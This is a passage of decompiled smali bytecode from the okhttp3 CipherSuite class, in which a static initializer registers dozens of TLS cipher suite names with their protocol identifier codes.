                        284sput-object v0, Lokhttp3/CipherSuite;->TLS_RSA_WITH_AES_128_CBC_SHA:Lokhttp3/CipherSuite;
                        286sget-object v0, Lokhttp3/CipherSuite;->Companion:Lokhttp3/CipherSuite$Companion;
                        288const-string v1, "TLS_DHE_DSS_WITH_AES_128_CBC_SHA"
                        289const/16 v2, 0x32
                        291invoke-static {v0, v1, v2}, Lokhttp3/CipherSuite$Companion;->access$init(Lokhttp3/CipherSuite$Companion;Ljava/lang/String;I)Lokhttp3/CipherSuite;
                        292move-result-object v0
                        293sput-object v0, Lokhttp3/CipherSuite;->TLS_DHE_DSS_WITH_AES_128_CBC_SHA:Lokhttp3/CipherSuite;
                        295sget-object v0, Lokhttp3/CipherSuite;->Companion:Lokhttp3/CipherSuite$Companion;
                        297const-string v1, "TLS_DHE_RSA_WITH_AES_128_CBC_SHA"
                        298const/16 v2, 0x33
                        300invoke-static {v0, v1, v2}, Lokhttp3/CipherSuite$Companion;->access$init(Lokhttp3/CipherSuite$Companion;Ljava/lang/String;I)Lokhttp3/CipherSuite;
                        301move-result-object v0
                        302sput-object v0, Lokhttp3/CipherSuite;->TLS_DHE_RSA_WITH_AES_128_CBC_SHA:Lokhttp3/CipherSuite;
                        304sget-object v0, Lokhttp3/CipherSuite;->Companion:Lokhttp3/CipherSuite$Companion;
                        306const-string v1, "TLS_DH_anon_WITH_AES_128_CBC_SHA"
                        307const/16 v2, 0x34
                        309invoke-static {v0, v1, v2}, Lokhttp3/CipherSuite$Companion;->access$init(Lokhttp3/CipherSuite$Companion;Ljava/lang/String;I)Lokhttp3/CipherSuite;
                        310move-result-object v0
                        311sput-object v0, Lokhttp3/CipherSuite;->TLS_DH_anon_WITH_AES_128_CBC_SHA:Lokhttp3/CipherSuite;
                        313sget-object v0, Lokhttp3/CipherSuite;->Companion:Lokhttp3/CipherSuite$Companion;
                        315const-string v1, "TLS_RSA_WITH_AES_256_CBC_SHA"
                        316const/16 v2, 0x35
                        318invoke-static {v0, v1, v2}, Lokhttp3/CipherSuite$Companion;->access$init(Lokhttp3/CipherSuite$Companion;Ljava/lang/String;I)Lokhttp3/CipherSuite;
                        319move-result-object v0
                        320sput-object v0, Lokhttp3/CipherSuite;->TLS_RSA_WITH_AES_256_CBC_SHA:Lokhttp3/CipherSuite;
                        322sget-object v0, Lokhttp3/CipherSuite;->Companion:Lokhttp3/CipherSuite$Companion;
                        324const-string v1, "TLS_DHE_DSS_WITH_AES_256_CBC_SHA"
                        325const/16 v2, 0x38
                        327invoke-static {v0, v1, v2}, Lokhttp3/CipherSuite$Companion;->access$init(Lokhttp3/CipherSuite$Companion;Ljava/lang/String;I)Lokhttp3/CipherSuite;
                        328move-result-object v0
                        329sput-object v0, Lokhttp3/CipherSuite;->TLS_DHE_DSS_WITH_AES_256_CBC_SHA:Lokhttp3/CipherSuite;
                        331sget-object v0, Lokhttp3/CipherSuite;->Companion:Lokhttp3/CipherSuite$Companion;
                        333const-string v1, "TLS_DHE_RSA_WITH_AES_256_CBC_SHA"
                        334const/16 v2, 0x39
                        336invoke-static {v0, v1, v2}, Lokhttp3/CipherSuite$Companion;->access$init(Lokhttp3/CipherSuite$Companion;Ljava/lang/String;I)Lokhttp3/CipherSuite;
                        337move-result-object v0
                        338sput-object v0, Lokhttp3/CipherSuite;->TLS_DHE_RSA_WITH_AES_256_CBC_SHA:Lokhttp3/CipherSuite;
                        340sget-object v0, Lokhttp3/CipherSuite;->Companion:Lokhttp3/CipherSuite$Companion;
                        342const-string v1, "TLS_DH_anon_WITH_AES_256_CBC_SHA"
                        343const/16 v2, 0x3a
                        345invoke-static {v0, v1, v2}, Lokhttp3/CipherSuite$Companion;->access$init(Lokhttp3/CipherSuite$Companion;Ljava/lang/String;I)Lokhttp3/CipherSuite;
                        346move-result-object v0
                        347sput-object v0, Lokhttp3/CipherSuite;->TLS_DH_anon_WITH_AES_256_CBC_SHA:Lokhttp3/CipherSuite;
                        349sget-object v0, Lokhttp3/CipherSuite;->Companion:Lokhttp3/CipherSuite$Companion;
                        351const-string v1, "TLS_RSA_WITH_NULL_SHA256"
                        352const/16 v2, 0x3b
                        354invoke-static {v0, v1, v2}, Lokhttp3/CipherSuite$Companion;->access$init(Lokhttp3/CipherSuite$Companion;Ljava/lang/String;I)Lokhttp3/CipherSuite;
                        355move-result-object v0
                        356sput-object v0, Lokhttp3/CipherSuite;->TLS_RSA_WITH_NULL_SHA256:Lokhttp3/CipherSuite;
                        358sget-object v0, Lokhttp3/CipherSuite;->Companion:Lokhttp3/CipherSuite$Companion;
                        360const-string v1, "TLS_RSA_WITH_AES_128_CBC_SHA256"
                        361const/16 v2, 0x3c
                        363invoke-static {v0, v1, v2}, Lokhttp3/CipherSuite$Companion;->access$init(Lokhttp3/CipherSuite$Companion;Ljava/lang/String;I)Lokhttp3/CipherSuite;
                        364move-result-object v0
                        365sput-object v0, Lokhttp3/CipherSuite;->TLS_RSA_WITH_AES_128_CBC_SHA256:Lokhttp3/CipherSuite;
                        367sget-object v0, Lokhttp3/CipherSuite;->Companion:Lokhttp3/CipherSuite$Companion;
                        369const-string v1, "TLS_RSA_WITH_AES_256_CBC_SHA256"
                        370const/16 v2, 0x3d
                        372invoke-static {v0, v1, v2}, Lokhttp3/CipherSuite$Companion;->access$init(Lokhttp3/CipherSuite$Companion;Ljava/lang/String;I)Lokhttp3/CipherSuite;
                        373move-result-object v0
                        374sput-object v0, Lokhttp3/CipherSuite;->TLS_RSA_WITH_AES_256_CBC_SHA256:Lokhttp3/CipherSuite;
                        376sget-object v0, Lokhttp3/CipherSuite;->Companion:Lokhttp3/CipherSuite$Companion;
                        378const-string v1, "TLS_DHE_DSS_WITH_AES_128_CBC_SHA256"
                        379const/16 v2, 0x40
                        381invoke-static {v0, v1, v2}, Lokhttp3/CipherSuite$Companion;->access$init(Lokhttp3/CipherSuite$Companion;Ljava/lang/String;I)Lokhttp3/CipherSuite;
                        382move-result-object v0
                        383sput-object v0, Lokhttp3/CipherSuite;->TLS_DHE_DSS_WITH_AES_128_CBC_SHA256:Lokhttp3/CipherSuite;
                        385sget-object v0, Lokhttp3/CipherSuite;->Companion:Lokhttp3/CipherSuite$Companion;
                        387const-string v1, "TLS_RSA_WITH_CAMELLIA_128_CBC_SHA"
                        388const/16 v2, 0x41
                        390invoke-static {v0, v1, v2}, Lokhttp3/CipherSuite$Companion;->access$init(Lokhttp3/CipherSuite$Companion;Ljava/lang/String;I)Lokhttp3/CipherSuite;
                        391move-result-object v0
                        392sput-object v0, Lokhttp3/CipherSuite;->TLS_RSA_WITH_CAMELLIA_128_CBC_SHA:Lokhttp3/CipherSuite;
                        394sget-object v0, Lokhttp3/CipherSuite;->Companion:Lokhttp3/CipherSuite$Companion;
                        396const-string v1, "TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA"
                        397const/16 v2, 0x44
                        399invoke-static {v0, v1, v2}, Lokhttp3/CipherSuite$Companion;->access$init(Lokhttp3/CipherSuite$Companion;Ljava/lang/String;I)Lokhttp3/CipherSuite;
                        400move-result-object v0
                        401sput-object v0, Lokhttp3/CipherSuite;->TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA:Lokhttp3/CipherSuite;
                        403sget-object v0, Lokhttp3/CipherSuite;->Companion:Lokhttp3/CipherSuite$Companion;
                        405const-string v1, "TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA"
                        406const/16 v2, 0x45
                        408invoke-static {v0, v1, v2}, Lokhttp3/CipherSuite$Companion;->access$init(Lokhttp3/CipherSuite$Companion;Ljava/lang/String;I)Lokhttp3/CipherSuite;
                        409move-result-object v0
                        410sput-object v0, Lokhttp3/CipherSuite;->TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA:Lokhttp3/CipherSuite;
                        412sget-object v0, Lokhttp3/CipherSuite;->Companion:Lokhttp3/CipherSuite$Companion;
                        414const-string v1, "TLS_DHE_RSA_WITH_AES_128_CBC_SHA256"
                        415const/16 v2, 0x67
                        417invoke-static {v0, v1, v2}, Lokhttp3/CipherSuite$Companion;->access$init(Lokhttp3/CipherSuite$Companion;Ljava/lang/String;I)Lokhttp3/CipherSuite;
                        418move-result-object v0
                        419sput-object v0, Lokhttp3/CipherSuite;->TLS_DHE_RSA_WITH_AES_128_CBC_SHA256:Lokhttp3/CipherSuite;
                        421sget-object v0, Lokhttp3/CipherSuite;->Companion:Lokhttp3/CipherSuite$Companion;
                        423const-string v1, "TLS_DHE_DSS_WITH_AES_256_CBC_SHA256"
                        424const/16 v2, 0x6a
                        426invoke-static {v0, v1, v2}, Lokhttp3/CipherSuite$Companion;->access$init(Lokhttp3/CipherSuite$Companion;Ljava/lang/String;I)Lokhttp3/CipherSuite;
                        427move-result-object v0
                        428sput-object v0, Lokhttp3/CipherSuite;->TLS_DHE_DSS_WITH_AES_256_CBC_SHA256:Lokhttp3/CipherSuite;
                        430sget-object v0, Lokhttp3/CipherSuite;->Companion:Lokhttp3/CipherSuite$Companion;
                        432const-string v1, "TLS_DHE_RSA_WITH_AES_256_CBC_SHA256"
                        433const/16 v2, 0x6b
                        435invoke-static {v0, v1, v2}, Lokhttp3/CipherSuite$Companion;->access$init(Lokhttp3/CipherSuite$Companion;Ljava/lang/String;I)Lokhttp3/CipherSuite;
                        436move-result-object v0
                        437sput-object v0, Lokhttp3/CipherSuite;->TLS_DHE_RSA_WITH_AES_256_CBC_SHA256:Lokhttp3/CipherSuite;
                        439sget-object v0, Lokhttp3/CipherSuite;->Companion:Lokhttp3/CipherSuite$Companion;
                        441const-string v1, "TLS_DH_anon_WITH_AES_128_CBC_SHA256"
                        442const/16 v2, 0x6c
                        444invoke-static {v0, v1, v2}, Lokhttp3/CipherSuite$Companion;->access$init(Lokhttp3/CipherSuite$Companion;Ljava/lang/String;I)Lokhttp3/CipherSuite;
                        445move-result-object v0
                        446sput-object v0, Lokhttp3/CipherSuite;->TLS_DH_anon_WITH_AES_128_CBC_SHA256:Lokhttp3/CipherSuite;
                        448sget-object v0, Lokhttp3/CipherSuite;->Companion:Lokhttp3/CipherSuite$Companion;
                        450const-string v1, "TLS_DH_anon_WITH_AES_256_CBC_SHA256"
                        451const/16 v2, 0x6d
                        453invoke-static {v0, v1, v2}, Lokhttp3/CipherSuite$Companion;->access$init(Lokhttp3/CipherSuite$Companion;Ljava/lang/String;I)Lokhttp3/CipherSuite;
                        454move-result-object v0
                        455sput-object v0, Lokhttp3/CipherSuite;->TLS_DH_anon_WITH_AES_256_CBC_SHA256:Lokhttp3/CipherSuite;
                        457sget-object v0, Lokhttp3/CipherSuite;->Companion:Lokhttp3/CipherSuite$Companion;
                        459const-string v1, "TLS_RSA_WITH_CAMELLIA_256_CBC_SHA"
                        460const/16 v2, 0x84
                        462invoke-static {v0, v1, v2}, Lokhttp3/CipherSuite$Companion;->access$init(Lokhttp3/CipherSuite$Companion;Ljava/lang/String;I)Lokhttp3/CipherSuite;
                        463move-result-object v0
                        464sput-object v0, Lokhttp3/CipherSuite;->TLS_RSA_WITH_CAMELLIA_256_CBC_SHA:Lokhttp3/CipherSuite;
                        466sget-object v0, Lokhttp3/CipherSuite;->Companion:Lokhttp3/CipherSuite$Companion;
                        468const-string v1, "TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA"
                        469const/16 v2, 0x87
                        471invoke-static {v0, v1, v2}, Lokhttp3/CipherSuite$Companion;->access$init(Lokhttp3/CipherSuite$Companion;Ljava/lang/String;I)Lokhttp3/CipherSuite;
                        472move-result-object v0
                        473sput-object v0, Lokhttp3/CipherSuite;->TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA:Lokhttp3/CipherSuite;
                        475sget-object v0, Lokhttp3/CipherSuite;->Companion:Lokhttp3/CipherSuite$Companion;
                        477const-string v1, "TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA"
                        478const/16 v2, 0x88
                        480invoke-static {v0, v1, v2}, Lokhttp3/CipherSuite$Companion;->access$init(Lokhttp3/CipherSuite$Companion;Ljava/lang/String;I)Lokhttp3/CipherSuite;
                        481move-result-object v0
                        482sput-object v0, Lokhttp3/CipherSuite;->TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA:Lokhttp3/CipherSuite;
                        484sget-object v0, Lokhttp3/CipherSuite;->Companion:Lokhttp3/CipherSuite$Companion;
                        486const-string v1, "TLS_PSK_WITH_RC4_128_SHA"
                        487const/16 v2, 0x8a
                        489invoke-static {v0, v1, v2}, Lokhttp3/CipherSuite$Companion;->access$init(Lokhttp3/CipherSuite$Companion;Ljava/lang/String;I)Lokhttp3/CipherSuite;
                        490move-result-object v0
                        491sput-object v0, Lokhttp3/CipherSuite;->TLS_PSK_WITH_RC4_128_SHA:Lokhttp3/CipherSuite;
                        493sget-object v0, Lokhttp3/CipherSuite;->Companion:Lokhttp3/CipherSuite$Companion;
                        495const-string v1, "TLS_PSK_WITH_3DES_EDE_CBC_SHA"
                        496const/16 v2, 0x8b
                        498invoke-static {v0, v1, v2}, Lokhttp3/CipherSuite$Companion;->access$init(Lokhttp3/CipherSuite$Companion;Ljava/lang/String;I)Lokhttp3/CipherSuite;
                        499move-result-object v0
                        500sput-object v0, Lokhttp3/CipherSuite;->TLS_PSK_WITH_3DES_EDE_CBC_SHA:Lokhttp3/CipherSuite;
                        502sget-object v0, Lokhttp3/CipherSuite;->Companion:Lokhttp3/CipherSuite$Companion;
                        504const-string v1, "TLS_PSK_WITH_AES_128_CBC_SHA"
                        505const/16 v2, 0x8c
                        507invoke-static {v0, v1, v2}, Lokhttp3/CipherSuite$Companion;->access$init(Lokhttp3/CipherSuite$Companion;Ljava/lang/String;I)Lokhttp3/CipherSuite;
                        508move-result-object v0
                        509sput-object v0, Lokhttp3/CipherSuite;->TLS_PSK_WITH_AES_128_CBC_SHA:Lokhttp3/CipherSuite;
                        511sget-object v0, Lokhttp3/CipherSuite;->Companion:Lokhttp3/CipherSuite$Companion;
                        513const-string v1, "TLS_PSK_WITH_AES_256_CBC_SHA"
                        514const/16 v2, 0x8d
                        516invoke-static {v0, v1, v2}, Lokhttp3/CipherSuite$Companion;->access$init(Lokhttp3/CipherSuite$Companion;Ljava/lang/String;I)Lokhttp3/CipherSuite;
                        517move-result-object v0
                        518sput-object v0, Lokhttp3/CipherSuite;->TLS_PSK_WITH_AES_256_CBC_SHA:Lokhttp3/CipherSuite;
                        520sget-object v0, Lokhttp3/CipherSuite;->Companion:Lokhttp3/CipherSuite$Companion;
                        522const-string v1, "TLS_RSA_WITH_SEED_CBC_SHA"
                        523const/16 v2, 0x96
                        525invoke-static {v0, v1, v2}, Lokhttp3/CipherSuite$Companion;->access$init(Lokhttp3/CipherSuite$Companion;Ljava/lang/String;I)Lokhttp3/CipherSuite;
                        526move-result-object v0
                        527sput-object v0, Lokhttp3/CipherSuite;->TLS_RSA_WITH_SEED_CBC_SHA:Lokhttp3/CipherSuite;
                        529sget-object v0, Lokhttp3/CipherSuite;->Companion:Lokhttp3/CipherSuite$Companion;
                        531const-string v1, "TLS_RSA_WITH_AES_128_GCM_SHA256"
                        532const/16 v2, 0x9c
                        534invoke-static {v0, v1, v2}, Lokhttp3/CipherSuite$Companion;->access$init(Lokhttp3/CipherSuite$Companion;Ljava/lang/String;I)Lokhttp3/CipherSuite;
                        535move-result-object v0
                        536sput-object v0, Lokhttp3/CipherSuite;->TLS_RSA_WITH_AES_128_GCM_SHA256:Lokhttp3/CipherSuite;
                        538sget-object v0, Lokhttp3/CipherSuite;->Companion:Lokhttp3/CipherSuite$Companion;
                        540const-string v1, "TLS_RSA_WITH_AES_256_GCM_SHA384"
                        541const/16 v2, 0x9d
                        543invoke-static {v0, v1, v2}, Lokhttp3/CipherSuite$Companion;->access$init(Lokhttp3/CipherSuite$Companion;Ljava/lang/String;I)Lokhttp3/CipherSuite;
                        544move-result-object v0
                        545sput-object v0, Lokhttp3/CipherSuite;->TLS_RSA_WITH_AES_256_GCM_SHA384:Lokhttp3/CipherSuite;
                        547sget-object v0, Lokhttp3/CipherSuite;->Companion:Lokhttp3/CipherSuite$Companion;
                        549const-string v1, "TLS_DHE_RSA_WITH_AES_128_GCM_SHA256"
                        550const/16 v2, 0x9e
                        552invoke-static {v0, v1, v2}, Lokhttp3/CipherSuite$Companion;->access$init(Lokhttp3/CipherSuite$Companion;Ljava/lang/String;I)Lokhttp3/CipherSuite;
                        553move-result-object v0
                        554sput-object v0, Lokhttp3/CipherSuite;->TLS_DHE_RSA_WITH_AES_128_GCM_SHA256:Lokhttp3/CipherSuite;
                        556sget-object v0, Lokhttp3/CipherSuite;->Companion:Lokhttp3/CipherSuite$Companion;
                        558const-string v1, "TLS_DHE_RSA_WITH_AES_256_GCM_SHA384"
                        559const/16 v2, 0x9f
                        561invoke-static {v0, v1, v2}, Lokhttp3/CipherSuite$Companion;->access$init(Lokhttp3/CipherSuite$Companion;Ljava/lang/String;I)Lokhttp3/CipherSuite;
                        562move-result-object v0
                        563sput-object v0, Lokhttp3/CipherSuite;->TLS_DHE_RSA_WITH_AES_256_GCM_SHA384:Lokhttp3/CipherSuite;
                        565sget-object v0, Lokhttp3/CipherSuite;->Companion:Lokhttp3/CipherSuite$Companion;
                        567const-string v1, "TLS_DHE_DSS_WITH_AES_128_GCM_SHA256"
                        568const/16 v2, 0xa2
                        570invoke-static {v0, v1, v2}, Lokhttp3/CipherSuite$Companion;->access$init(Lokhttp3/CipherSuite$Companion;Ljava/lang/String;I)Lokhttp3/CipherSuite;
                        571move-result-object v0
                        572sput-object v0, Lokhttp3/CipherSuite;->TLS_DHE_DSS_WITH_AES_128_GCM_SHA256:Lokhttp3/CipherSuite;
                        574sget-object v0, Lokhttp3/CipherSuite;->Companion:Lokhttp3/CipherSuite$Companion;
                        576const-string v1, "TLS_DHE_DSS_WITH_AES_256_GCM_SHA384"
                        577const/16 v2, 0xa3
                        579invoke-static {v0, v1, v2}, Lokhttp3/CipherSuite$Companion;->access$init(Lokhttp3/CipherSuite$Companion;Ljava/lang/String;I)Lokhttp3/CipherSuite;
                        580move-result-object v0
                        581sput-object v0, Lokhttp3/CipherSuite;->TLS_DHE_DSS_WITH_AES_256_GCM_SHA384:Lokhttp3/CipherSuite;
                        583sget-object v0, Lokhttp3/CipherSuite;->Companion:Lokhttp3/CipherSuite$Companion;
                        585const-string v1, "TLS_DH_anon_WITH_AES_128_GCM_SHA256"
                        586const/16 v2, 0xa6
                        588invoke-static {v0, v1, v2}, Lokhttp3/CipherSuite$Companion;->access$init(Lokhttp3/CipherSuite$Companion;Ljava/lang/String;I)Lokhttp3/CipherSuite;
                        589move-result-object v0
                        590sput-object v0, Lokhttp3/CipherSuite;->TLS_DH_anon_WITH_AES_128_GCM_SHA256:Lokhttp3/CipherSuite;
                        592sget-object v0, Lokhttp3/CipherSuite;->Companion:Lokhttp3/CipherSuite$Companion;
                        594const-string v1, "TLS_DH_anon_WITH_AES_256_GCM_SHA384"
                        595const/16 v2, 0xa7
                        597invoke-static {v0, v1, v2}, Lokhttp3/CipherSuite$Companion;->access$init(Lokhttp3/CipherSuite$Companion;Ljava/lang/String;I)Lokhttp3/CipherSuite;
                        598move-result-object v0
                        599sput-object v0, Lokhttp3/CipherSuite;->TLS_DH_anon_WITH_AES_256_GCM_SHA384:Lokhttp3/CipherSuite;
                        601sget-object v0, Lokhttp3/CipherSuite;->Companion:Lokhttp3/CipherSuite$Companion;
                        603const-string v1, "TLS_EMPTY_RENEGOTIATION_INFO_SCSV"
                        604const/16 v2, 0xff
                        606invoke-static {v0, v1, v2}, Lokhttp3/CipherSuite$Companion;->access$init(Lokhttp3/CipherSuite$Companion;Ljava/lang/String;I)Lokhttp3/CipherSuite;
                        607move-result-object v0
                        608sput-object v0, Lokhttp3/CipherSuite;->TLS_EMPTY_RENEGOTIATION_INFO_SCSV:Lokhttp3/CipherSuite;
                        610sget-object v0, Lokhttp3/CipherSuite;->Companion:Lokhttp3/CipherSuite$Companion;
                        612const-string v1, "TLS_FALLBACK_SCSV"
                        613const/16 v2, 0x5600
                        615invoke-static {v0, v1, v2}, Lokhttp3/CipherSuite$Companion;->access$init(Lokhttp3/CipherSuite$Companion;Ljava/lang/String;I)Lokhttp3/CipherSuite;
                        616move-result-object v0
                        617sput-object v0, Lokhttp3/CipherSuite;->TLS_FALLBACK_SCSV:Lokhttp3/CipherSuite;
                        619sget-object v0, Lokhttp3/CipherSuite;->Companion:Lokhttp3/CipherSuite$Companion;
                        621const-string v1, "TLS_ECDH_ECDSA_WITH_NULL_SHA"
                        622const v2, 0xc001
                        624invoke-static {v0, v1, v2}, Lokhttp3/CipherSuite$Companion;->access$init(Lokhttp3/CipherSuite$Companion;Ljava/lang/String;I)Lokhttp3/CipherSuite;
                        625move-result-object v0
                        626sput-object v0, Lokhttp3/CipherSuite;->TLS_ECDH_ECDSA_WITH_NULL_SHA:Lokhttp3/CipherSuite;
                        628sget-object v0, Lokhttp3/CipherSuite;->Companion:Lokhttp3/CipherSuite$Companion;
                        630const-string v1, "TLS_ECDH_ECDSA_WITH_RC4_128_SHA"
                        631const v2, 0xc002
                        633invoke-static {v0, v1, v2}, Lokhttp3/CipherSuite$Companion;->access$init(Lokhttp3/CipherSuite$Companion;Ljava/lang/String;I)Lokhttp3/CipherSuite;
                        634move-result-object v0
                        635sput-object v0, Lokhttp3/CipherSuite;->TLS_ECDH_ECDSA_WITH_RC4_128_SHA:Lokhttp3/CipherSuite;
                        637sget-object v0, Lokhttp3/CipherSuite;->Companion:Lokhttp3/CipherSuite$Companion;
                        639const-string v1, "TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA"
                        640const v2, 0xc003
                        642invoke-static {v0, v1, v2}, Lokhttp3/CipherSuite$Companion;->access$init(Lokhttp3/CipherSuite$Companion;Ljava/lang/String;I)Lokhttp3/CipherSuite;
                        643move-result-object v0
                        644sput-object v0, Lokhttp3/CipherSuite;->TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA:Lokhttp3/CipherSuite;
                        646sget-object v0, Lokhttp3/CipherSuite;->Companion:Lokhttp3/CipherSuite$Companion;
                        648const-string v1, "TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA"
                        649const v2, 0xc004
                        651invoke-static {v0, v1, v2}, Lokhttp3/CipherSuite$Companion;->access$init(Lokhttp3/CipherSuite$Companion;Ljava/lang/String;I)Lokhttp3/CipherSuite;
                        652move-result-object v0
                        653sput-object v0, Lokhttp3/CipherSuite;->TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA:Lokhttp3/CipherSuite;
                        655sget-object v0, Lokhttp3/CipherSuite;->Companion:Lokhttp3/CipherSuite$Companion;
                        657const-string v1, "TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA"
                        658const v2, 0xc005
                        660invoke-static {v0, v1, v2}, Lokhttp3/CipherSuite$Companion;->access$init(Lokhttp3/CipherSuite$Companion;Ljava/lang/String;I)Lokhttp3/CipherSuite;
                        661move-result-object v0
                        662sput-object v0, Lokhttp3/CipherSuite;->TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA:Lokhttp3/CipherSuite;
                        664sget-object v0, Lokhttp3/CipherSuite;->Companion:Lokhttp3/CipherSuite$Companion;
                        666const-string v1, "TLS_ECDHE_ECDSA_WITH_NULL_SHA"
                        667const v2, 0xc006
                        669invoke-static {v0, v1, v2}, Lokhttp3/CipherSuite$Companion;->access$init(Lokhttp3/CipherSuite$Companion;Ljava/lang/String;I)Lokhttp3/CipherSuite;
                        670move-result-object v0
                        671sput-object v0, Lokhttp3/CipherSuite;->TLS_ECDHE_ECDSA_WITH_NULL_SHA:Lokhttp3/CipherSuite;
                        673sget-object v0, Lokhttp3/CipherSuite;->Companion:Lokhttp3/CipherSuite$Companion;
                        675const-string v1, "TLS_ECDHE_ECDSA_WITH_RC4_128_SHA"
                        676const v2, 0xc007
                        678invoke-static {v0, v1, v2}, Lokhttp3/CipherSuite$Companion;->access$init(Lokhttp3/CipherSuite$Companion;Ljava/lang/String;I)Lokhttp3/CipherSuite;
                        679move-result-object v0
                        680sput-object v0, Lokhttp3/CipherSuite;->TLS_ECDHE_ECDSA_WITH_RC4_128_SHA:Lokhttp3/CipherSuite;
                        682sget-object v0, Lokhttp3/CipherSuite;->Companion:Lokhttp3/CipherSuite$Companion;
                        684const-string v1, "TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA"
                        685const v2, 0xc008
                        687invoke-static {v0, v1, v2}, Lokhttp3/CipherSuite$Companion;->access$init(Lokhttp3/CipherSuite$Companion;Ljava/lang/String;I)Lokhttp3/CipherSuite;
                        688move-result-object v0
                        689sput-object v0, Lokhttp3/CipherSuite;->TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA:Lokhttp3/CipherSuite;
                        691sget-object v0, Lokhttp3/CipherSuite;->Companion:Lokhttp3/CipherSuite$Companion;
                        693const-string v1, "TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA"
                        694const v2, 0xc009
                        696invoke-static {v0, v1, v2}, Lokhttp3/CipherSuite$Companion;->access$init(Lokhttp3/CipherSuite$Companion;Ljava/lang/String;I)Lokhttp3/CipherSuite;
                        697move-result-object v0
                        698sput-object v0, Lokhttp3/CipherSuite;->TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA:Lokhttp3/CipherSuite;
                        700sget-object v0, Lokhttp3/CipherSuite;->Companion:Lokhttp3/CipherSuite$Companion;
                        702const-string v1, "TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA"
                        703const v2, 0xc00a
                        705invoke-static {v0, v1, v2}, Lokhttp3/CipherSuite$Companion;->access$init(Lokhttp3/CipherSuite$Companion;Ljava/lang/String;I)Lokhttp3/CipherSuite;
                        706move-result-object v0
                        707sput-object v0, Lokhttp3/CipherSuite;->TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA:Lokhttp3/CipherSuite;
                        709sget-object v0, Lokhttp3/CipherSuite;->Companion:Lokhttp3/CipherSuite$Companion;
                        711const-string v1, "TLS_ECDH_RSA_WITH_NULL_SHA"
                        712const v2, 0xc00b
                        714invoke-static {v0, v1, v2}, Lokhttp3/CipherSuite$Companion;->access$init(Lokhttp3/CipherSuite$Companion;Ljava/lang/String;I)Lokhttp3/CipherSuite;
                        715move-result-object v0
                        716sput-object v0, Lokhttp3/CipherSuite;->TLS_ECDH_RSA_WITH_NULL_SHA:Lokhttp3/CipherSuite;
                        718sget-object v0, Lokhttp3/CipherSuite;->Companion:Lokhttp3/CipherSuite$Companion;
                        720const-string v1, "TLS_ECDH_RSA_WITH_RC4_128_SHA"
                        721const v2, 0xc00c
                        723invoke-static {v0, v1, v2}, Lokhttp3/CipherSuite$Companion;->access$init(Lokhttp3/CipherSuite$Companion;Ljava/lang/String;I)Lokhttp3/CipherSuite;
                        724move-result-object v0
                        725sput-object v0, Lokhttp3/CipherSuite;->TLS_ECDH_RSA_WITH_RC4_128_SHA:Lokhttp3/CipherSuite;
                        727sget-object v0, Lokhttp3/CipherSuite;->Companion:Lokhttp3/CipherSuite$Companion;
                        729const-string v1, "TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA"
                        730const v2, 0xc00d
                        732invoke-static {v0, v1, v2}, Lokhttp3/CipherSuite$Companion;->access$init(Lokhttp3/CipherSuite$Companion;Ljava/lang/String;I)Lokhttp3/CipherSuite;
                        733move-result-object v0
                        734sput-object v0, Lokhttp3/CipherSuite;->TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA:Lokhttp3/CipherSuite;
                        736sget-object v0, Lokhttp3/CipherSuite;->Companion:Lokhttp3/CipherSuite$Companion;
                        738const-string v1, "TLS_ECDH_RSA_WITH_AES_128_CBC_SHA"
                        739const v2, 0xc00e
                        741invoke-static {v0, v1, v2}, Lokhttp3/CipherSuite$Companion;->access$init(Lokhttp3/CipherSuite$Companion;Ljava/lang/String;I)Lokhttp3/CipherSuite;
                        742move-result-object v0
                        743sput-object v0, Lokhttp3/CipherSuite;->TLS_ECDH_RSA_WITH_AES_128_CBC_SHA:Lokhttp3/CipherSuite;
                        745sget-object v0, Lokhttp3/CipherSuite;->Companion:Lokhttp3/CipherSuite$Companion;
                        747const-string v1, "TLS_ECDH_RSA_WITH_AES_256_CBC_SHA"
                        748const v2, 0xc00f
                        750invoke-static {v0, v1, v2}, Lokhttp3/CipherSuite$Companion;->access$init(Lokhttp3/CipherSuite$Companion;Ljava/lang/String;I)Lokhttp3/CipherSuite;
                        751move-result-object v0
                        752sput-object v0, Lokhttp3/CipherSuite;->TLS_ECDH_RSA_WITH_AES_256_CBC_SHA:Lokhttp3/CipherSuite;
                        754sget-object v0, Lokhttp3/CipherSuite;->Companion:Lokhttp3/CipherSuite$Companion;
                        756const-string v1, "TLS_ECDHE_RSA_WITH_NULL_SHA"
                        757const v2, 0xc010
                        759invoke-static {v0, v1, v2}, Lokhttp3/CipherSuite$Companion;->access$init(Lokhttp3/CipherSuite$Companion;Ljava/lang/String;I)Lokhttp3/CipherSuite;
                        760move-result-object v0
                        761sput-object v0, Lokhttp3/CipherSuite;->TLS_ECDHE_RSA_WITH_NULL_SHA:Lokhttp3/CipherSuite;
                        763sget-object v0, Lokhttp3/CipherSuite;->Companion:Lokhttp3/CipherSuite$Companion;
                        765const-string v1, "TLS_ECDHE_RSA_WITH_RC4_128_SHA"
                        766const v2, 0xc011
                        768invoke-static {v0, v1, v2}, Lokhttp3/CipherSuite$Companion;->access$init(Lokhttp3/CipherSuite$Companion;Ljava/lang/String;I)Lokhttp3/CipherSuite;
                        769move-result-object v0
                        770sput-object v0, Lokhttp3/CipherSuite;->TLS_ECDHE_RSA_WITH_RC4_128_SHA:Lokhttp3/CipherSuite;
